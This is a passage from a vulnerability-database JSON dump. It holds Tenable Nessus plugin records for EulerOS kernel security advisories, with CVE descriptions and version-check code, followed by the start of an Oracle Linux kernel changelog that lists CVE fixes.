crypto/ansi_cprng.c in the Linux kernel through 3.11.4\n makes it easier for context-dependent attackers to\n defeat cryptographic protection mechanisms via multiple\n requests for small amounts of data, leading to improper\n management of the state of the consumed\n data.(CVE-2013-4345i1/4%0\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n uses an incorrect type of mutex, which allows local\n users to cause a denial of service (race condition,\n use-after-free, and system crash) via a crafted ioctl\n call.(CVE-2016-2546i1/4%0\n\n - The do_get_mempolicy function in mm/mempolicy.c in the\n Linux kernel before 4.12.9 allows local users to cause\n a denial of service (use-after-free) or possibly have\n unspecified other impact via crafted system\n calls.(CVE-2018-10675i1/4%0\n\n - A certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332i1/4%0\n\n - It was found that the try_to_unmap_cluster() function\n in the Linux kernel's Memory Managment subsystem did\n not properly handle page locking in certain cases,\n which could potentially trigger the BUG_ON() macro in\n the mlock_vma_page() function. A local, unprivileged\n user could use this flaw to crash the\n system.(CVE-2014-3122i1/4%0\n\n - The blkcg_init_queue function in block/blk-cgroup.c in\n the Linux kernel, before 4.11, allows local users to\n cause a denial of service (double free) or possibly\n have unspecified other impact by triggering a creation\n failure.(CVE-2018-7480i1/4%0\n\n - The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184i1/4%0\n\n - The etm_setup_aux function in\n drivers/hwtracing/coresight/coresight-etm-perf.c in the\n Linux kernel before 4.10.2 allows attackers to cause a\n denial of service (panic) because a parameter is\n incorrectly used as a local variable.(CVE-2018-11232i1/4%0\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360i1/4%0\n\n - A flaw was found where the XFS filesystem code\n mishandles a user-settable inode flag in the Linux\n kernel prior to 4.14-rc1. This can cause a local denial\n of service via a kernel panic.(CVE-2017-14340i1/4%0\n\n - An issue was discovered in the Linux kernel through\n 4.19. An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds\n checking.(CVE-2018-18710i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1471)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2013-4345", "CVE-2014-0155", "CVE-2015-4176", "CVE-2015-3332", "CVE-2018-11232", "CVE-2018-10675", "CVE-2014-4014", "CVE-2016-2184", "CVE-2018-18710", "CVE-2017-18218", "CVE-2017-14340", "CVE-2016-2545", "CVE-2013-7421", "CVE-2017-5669", "CVE-2017-18360", "CVE-2016-2546", "CVE-2017-16531", "CVE-2018-7480", "CVE-2013-2889"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1471.NASL", "href": "https://www.tenable.com/plugins/nessus/124795", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124795);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-2889\",\n \"CVE-2013-4345\",\n \"CVE-2013-7421\",\n \"CVE-2014-0155\",\n \"CVE-2014-3122\",\n \"CVE-2014-4014\",\n \"CVE-2015-3332\",\n \"CVE-2015-4176\",\n \"CVE-2016-2184\",\n \"CVE-2016-2545\",\n \"CVE-2016-2546\",\n \"CVE-2017-14340\",\n \"CVE-2017-16531\",\n \"CVE-2017-18218\",\n \"CVE-2017-18360\",\n \"CVE-2017-5669\",\n \"CVE-2018-10675\",\n \"CVE-2018-11232\",\n \"CVE-2018-18710\",\n \"CVE-2018-7480\"\n );\n script_bugtraq_id(\n 62042,\n 62740,\n 66688,\n 67162,\n 67988,\n 72322,\n 74232\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1471)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - drivers/hid/hid-zpff.c in the Human Interface Device\n (HID) subsystem in the Linux kernel through 3.11, when\n CONFIG_HID_ZEROPLUS is enabled, allows physically\n proximate attackers to cause a denial of service\n (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2889i1/4%0\n\n - The capabilities implementation in the Linux kernel\n before 3.14.8 does not properly consider that\n namespaces are inapplicable to inodes, which allows\n local users to bypass intended chmod restrictions by\n first creating a user namespace, as demonstrated by\n setting the setgid bit on a file with group ownership\n of root.(CVE-2014-4014i1/4%0\n\n - The function drivers/usb/core/config.c in the Linux\n kernel, allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531i1/4%0\n\n - The snd_timer_interrupt function in sound/core/timer.c\n in the Linux kernel before 4.4.1 does not properly\n maintain a certain linked list, which allows local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl\n call.(CVE-2016-2545i1/4%0\n\n - A flaw was found in the Linux kernel where the deletion\n of a file or directory could trigger an unmount and\n reveal data under a mount point. This flaw was\n inadvertently introduced with the new feature of being\n able to lazily unmount a mount tree when using file\n system user namespaces.(CVE-2015-4176i1/4%0\n\n - The do_shmat function in ipc/shm.c in the Linux kernel,\n through 4.9.12, does not restrict the address\n calculated by a certain rounding operation. This allows\n privileged local users to map page zero and,\n consequently, bypass a protection mechanism that exists\n for the mmap system call. This is possible by making\n crafted shmget and shmat system calls in a privileged\n context.(CVE-2017-5669i1/4%0\n\n - In drivers/net/ethernet/hisilicon/hns/hns_enet.c in the\n Linux kernel, before 4.13, local users can cause a\n denial of service (use-after-free and BUG) or possibly\n have unspecified other impact by leveraging differences\n in skb handling between hns_nic_net_xmit_hw and\n hns_nic_net_xmit.(CVE-2017-18218i1/4%0\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the\n Linux kernel through 3.14.1 does not properly validate\n the kvm_irq_delivery_to_apic return value, which allows\n guest OS users to cause a denial of service (host OS\n crash) via a crafted entry in the redirection table of\n an I/O APIC. NOTE: the affected code was moved to the\n ioapic_service function before the vulnerability was\n announced.(CVE-2014-0155i1/4%0\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2013-7421i1/4%0\n\n - Off-by-one error in the get_prng_bytes function in\n crypto/ansi_cprng.c in the Linux kernel through 3.11.4\n makes it easier for context-dependent attackers to\n defeat cryptographic protection mechanisms via multiple\n requests for small amounts of data, leading to improper\n management of the state of the consumed\n data.(CVE-2013-4345i1/4%0\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n uses an incorrect type of mutex, which allows local\n users to cause a denial of service (race condition,\n use-after-free, and system crash) via a crafted ioctl\n call.(CVE-2016-2546i1/4%0\n\n - The do_get_mempolicy function in mm/mempolicy.c in the\n Linux kernel before 4.12.9 allows local users to cause\n a denial of service (use-after-free) or possibly have\n unspecified other impact via crafted system\n calls.(CVE-2018-10675i1/4%0\n\n - A certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allow local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332i1/4%0\n\n - It was found that the try_to_unmap_cluster() function\n in the Linux kernel's Memory Managment subsystem did\n not properly handle page locking in certain cases,\n which could potentially trigger the BUG_ON() macro in\n the mlock_vma_page() function. A local, unprivileged\n user could use this flaw to crash the\n system.(CVE-2014-3122i1/4%0\n\n - The blkcg_init_queue function in block/blk-cgroup.c in\n the Linux kernel, before 4.11, allows local users to\n cause a denial of service (double free) or possibly\n have unspecified other impact by triggering a creation\n failure.(CVE-2018-7480i1/4%0\n\n - The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184i1/4%0\n\n - The etm_setup_aux function in\n drivers/hwtracing/coresight/coresight-etm-perf.c in the\n Linux kernel before 4.10.2 allows attackers to cause a\n denial of service (panic) because a parameter is\n incorrectly used as a local variable.(CVE-2018-11232i1/4%0\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360i1/4%0\n\n - A flaw was found where the XFS filesystem code\n mishandles a user-settable inode flag in the Linux\n kernel prior to 4.14-rc1. This can cause a local denial\n of service via a kernel panic.(CVE-2017-14340i1/4%0\n\n - An issue was discovered in the Linux kernel through\n 4.19. An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds\n checking.(CVE-2018-18710i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1471\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d86ae156\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:55:16", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found In the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.i1/4^CVE-2018-19824i1/4%0\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.i1/4^CVE-2016-10741i1/4%0\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.i1/4^CVE-2017-18360i1/4%0\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and\n reused.i1/4^CVE-2018-18281i1/4%0\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.i1/4^CVE-2018-18559i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 9, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-04T00:00:00", "title": "EulerOS Virtualization 2.5.3 : kernel (EulerOS-SA-2019-1244)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19824", "CVE-2016-10741", "CVE-2018-18281", "CVE-2018-18559", "CVE-2017-18360"], "modified": "2019-04-04T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "cpe:/o:huawei:euleros:uvp:2.5.3"], "id": "EULEROS_SA-2019-1244.NASL", "href": "https://www.tenable.com/plugins/nessus/123712", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123712);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-10741\",\n \"CVE-2017-18360\",\n \"CVE-2018-18281\",\n \"CVE-2018-18559\",\n \"CVE-2018-19824\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.3 : kernel (EulerOS-SA-2019-1244)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found In the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.i1/4^CVE-2018-19824i1/4%0\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.i1/4^CVE-2016-10741i1/4%0\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.i1/4^CVE-2017-18360i1/4%0\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and\n reused.i1/4^CVE-2018-18281i1/4%0\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.i1/4^CVE-2018-18559i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1244\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ebc7ba2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.3\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.3\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10_132\",\n \"kernel-devel-3.10.0-514.44.5.10_132\",\n \"kernel-headers-3.10.0-514.44.5.10_132\",\n \"kernel-tools-3.10.0-514.44.5.10_132\",\n \"kernel-tools-libs-3.10.0-514.44.5.10_132\",\n \"kernel-tools-libs-devel-3.10.0-514.44.5.10_132\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "unix", "cvelist": ["CVE-2019-11190", "CVE-2015-5327", "CVE-2017-18360", "CVE-2018-19985"], "description": "[4.1.12-124.27.1]\n- scsi: libfc: sanitize E_D_TOV and R_A_TOV setting (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: use configured rport E_D_TOV (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: additional debugging messages (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: don't advance state machine for incoming FLOGI (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not login if the port is already started (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not drop down to FLOGI for fc_rport_login() (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not take rdata->rp_mutex when processing a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug: 25933179] \n- scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke) [Orabug: 25933179] \n- xve: arm ud tx cq to generate completion interrupts (Ajaykumar Hotchandani) [Orabug: 28267050] \n- net: sched: run ingress qdisc without locks (Alexei Starovoitov) [Orabug: 29395374] \n- bnxt_en: Fix typo in firmware message timeout logic. (Michael Chan) [Orabug: 29412112] \n- bnxt_en: Wait longer for the firmware message response to complete. (Michael Chan) [Orabug: 29412112] \n- mm,vmscan: Make unregister_shrinker() no-op if register_shrinker() failed. (Tetsuo Handa) [Orabug: 29456281] \n- X.509: Handle midnight alternative notation in GeneralizedTime (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Support leap seconds (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Fix the time validation [ver #2] (David Howells) [Orabug: 29460344] {CVE-2015-5327} {CVE-2015-5327}\n- be2net: enable new Kconfig items in kernel configs (Brian Maly) [Orabug: 29475071] \n- benet: remove broken and unused macro (Lubomir Rintel) [Orabug: 29475071] \n- be2net: don't flip hw_features when VXLANs are added/deleted (Davide Caratti) [Orabug: 29475071] \n- be2net: Fix memory leak in be_cmd_get_profile_config() (Petr Oros) [Orabug: 29475071] \n- be2net: Use Kconfig flag to support for enabling/disabling adapters (Petr Oros) [Orabug: 29475071] \n- be2net: Mark expected switch fall-through (Gustavo A. R. Silva) [Orabug: 29475071] \n- be2net: fix spelling mistake 'seqence' -> 'sequence' (Colin Ian King) [Orabug: 29475071] \n- be2net: Update the driver version to 12.0.0.0 (Suresh Reddy) [Orabug: 29475071] \n- be2net: gather debug info and reset adapter (only for Lancer) on a tx-timeout (Suresh Reddy) [Orabug: 29475071] \n- be2net: move rss_flags field in rss_info to ensure proper alignment (Ivan Vecera) [Orabug: 29475071] \n- be2net: re-order fields in be_error_recovert to avoid hole (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused tx_jiffies field from be_tx_stats (Ivan Vecera) [Orabug: 29475071] \n- be2net: move txcp field in be_tx_obj to eliminate holes in the struct (Ivan Vecera) [Orabug: 29475071] \n- be2net: reorder fields in be_eq_obj structure (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused old custom busy-poll fields (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused old AIC info (Ivan Vecera) [Orabug: 29475071] \n- be2net: Fix error detection logic for BE3 (Suresh Reddy) [Orabug: 29475071] \n- scsi: sd: Do not override max_sectors_kb sysfs setting (Martin K. Petersen) [Orabug: 29596510] \n- USB: serial: io_ti: fix div-by-zero in set_termios (Johan Hovold) [Orabug: 29487834] {CVE-2017-18360}\n- bnxt_en: Drop oversize TX packets to prevent errors. (Michael Chan) [Orabug: 29516462] \n- x86/speculation: Read per-cpu value of x86_spec_ctrl_priv in x86_virt_spec_ctrl() (Alejandro Jimenez) [Orabug: 29526401] \n- x86/speculation: Keep enhanced IBRS on when prctl is used for SSBD control (Alejandro Jimenez) [Orabug: 29526401] \n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605982] {CVE-2018-19985} {CVE-2018-19985}\n- swiotlb: save 